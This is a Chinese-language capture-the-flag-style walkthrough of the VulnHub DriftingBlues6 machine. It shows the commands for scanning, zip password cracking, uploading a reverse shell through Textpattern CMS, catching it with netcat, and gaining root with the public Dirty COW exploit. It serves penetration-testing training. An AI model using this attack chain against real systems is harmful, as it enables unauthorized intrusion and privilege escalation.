靶机渗透练习06-driftingblues6 (利用脏牛提权)
靶机地址: https://www.vulnhub.com/entry/driftingblues-6,672/
1、主机探活
arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24
2、端口扫描
nmap -sS -A -sV -T4 -p- 192.168.111.18
80—http—Apache httpd 2.2.22 ((Debian))
3、80端口访问,啥也没发现,查看源代码也没东西,那就扫一波目录吧
gobuster dir -u “http://192.168.111.18/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak
看到熟悉的老朋友:/robots.txt ,访问如下
User-agent: *
Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute
;)
访问/textpattern/textpattern/看到如下
指纹识别出是Textpattern CMS
robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码
4、使用kali破解zip压缩包密码
1、zip2john spammer.zip > password.txt
2、john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
得到密码是:myspace4 , 解压文件后,打开文件后查看文件内容得到账户密码 mayer : lionheart
5、进去后看到cms的版本是4.8.3
思路一:kali本地搜索漏洞: searchsploit textpattern 4.8.3 ,经测试利用失败
思路二:在后台页面进行寻找利用点
在content那发现存在文件上传
上传我们的反弹shell马(注意马里面的ip和端口要改成自己的kali ip),没有回显路径
但是我们在admin管理界面可以看到上传地址
kali开启监听:nc -lvnp 1234
再访问我们的马即可得到反弹shell使用 python 切换为 bash: python -c 'import pty; pty.spawn("/bin/bash")'
6、尝试提权
1、尝试suid提权: find / -perm -u=s -type f 2>/dev/null
在 https: /gtfobins.github.io/ 没有任何发现2、uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
内核版本>= 2.6.22 , 尝试脏牛提权
直接利用网上公开的exp进行尝试提权:https://github.com/FireFart/dirtycow
①进行编译,生成一个dirty的可执行文件:gcc -pthread dirty.c -o dirty -lcrypt
②执行./dirty 密码命令,即可进行提权。注:这里切换不了用户的话需要切换成交互式shell :python -c 'import pty; pty.spawn("/bin/bash")'
然后我们用登录firefart,密码就是我们自己输入的(我输入的是root),即可获得root权限
总结:
1、信息收集获取敏感文件
2、zip2john+john破解zip密码
3、利用后台文件上传获得webshell
4、脏牛提权获得root权限
完结散花~
参考:https://www.freebuf.com/articles/others-articles/279360.html
https://blog.csdn.net/weixin_43967893/article/details/115873236
https://blog.csdn.net/Aluxian_/article/details/123594952
鹏组安全的师傅提供的wp
靶机渗透练习06-driftingblues6 (利用脏牛提权)相关推荐
- [VulnHub靶机]Lampiao_脏牛提权
文章目录 环境介绍 实验步骤 1. 扫描端口 2. 信息收集 3. ssh爆破 4. drupal 7 漏洞getshell 5. 脏牛提权 环境介绍 攻击机:kali(192.168.56.104) ...
- 【vulnhub】Lampiao渗透实战(脏牛提权)
总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...
- 【甄选靶场】Vulnhub百个项目渗透——项目三十八:Tommy-Boy-1(修改UA,脏牛提权)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三十八:Tommy-Boy-1(修改UA,脏牛提权) 这个靶场被我打坏了,忘记快照了,自行官网下载哈~~
- 【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取) 靶场地址
- vulnhub--lampiao(脏牛提权)
目录 信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 发现敏感信息 扫描网站 上百度 发现漏洞 使用msfconsole模块 ge ...
- 永恒之蓝黑脏牛提权范围
SMBv1协议 MS17-010 --永恒之蓝漏洞 影响范围:Windows Vista.Win7.Win8.Win XP.Windows server 2003等. 防范措施:及时更新Windows ...
- Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
VulnOSv2 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 步骤一:枚举目录+主页挖掘 步骤二:OpenDocMan v1.2.7 cms利用 步骤三: ...
- linux 脏牛提权 cve-2016-5159
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶 ...
- 渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列的三个 ...
- 【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三:Raven-2(服务利用,udf提权)
最新文章
- JavaScript奇技淫巧44招(2)
- xman的思维导图快捷键_Xmind:ZEN思维导图有哪些使用技巧,最实用的快捷键是什么?...
- [Android] 底部菜单布局+PopupWindows实现弹出菜单功能(初级篇)
- 使用正则表达式从字符串中提取email
- 计算机病毒解析与防范结束语,2016年04月30日计算机病毒解析与防范题纲_向必青.doc...
- Easeljs之regX/regY详解
- Response JSON数据返回
- NLP --- 条件随机场CRF详解
- JavaScript:判断两个日期之间的差距天数
- WIN32汇编语言中位图的使用
- 新旧_飘云羽逸_新浪博客
- 搜索文件夹中word文档中的关键字
- python数据科学手册pdf中文版百度云,Python数据科学手册 英文pdf源码
- 两直线夹角求解-Python编程实现
- 结合P2P软件使用Ansible分发大文件
- Matlab GUI编程技巧(八):uitoolbar在图窗中创建工具栏
- 在线教育平台搭建的几种方案
- 网站并发量的计算方法
- 软件测试入门全流程精华总结【必看 知识点很全】
- 如何选择有效的CRM软件解决方案